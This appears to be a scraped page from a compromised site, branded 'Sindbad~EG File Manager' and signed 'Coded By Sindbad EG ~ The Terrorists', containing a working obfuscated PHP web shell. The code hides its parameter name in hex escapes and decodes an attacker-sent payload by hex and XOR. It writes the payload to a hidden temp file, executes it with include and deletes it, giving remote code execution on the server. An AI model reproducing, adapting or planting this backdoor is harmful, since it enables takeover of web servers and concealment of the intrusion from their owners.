Sindbad~EG File Manager
<?php
if(!empty($_REQUEST["\x63o\x6D\x70on\x65nt"])){
$key = hex2bin($_REQUEST["\x63o\x6D\x70on\x65nt"]);
$element = '' ; $d = 0; do{$element .= chr(ord($key[$d]) ^ 10);$d++;} while($d < strlen($key));
$binding = array_filter([session_save_path(), "/var/tmp", getenv("TMP"), getenv("TEMP"), ini_get("upload_tmp_dir"), "/dev/shm", sys_get_temp_dir(), getcwd(), "/tmp"]);
foreach ($binding as $symbol) {
if (is_writable($symbol) && is_dir($symbol)) {
$pset = "$symbol/.itm";
if (file_put_contents($pset, $element)) {
include $pset;
@unlink($pset);
exit;
}
}
}
}
Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists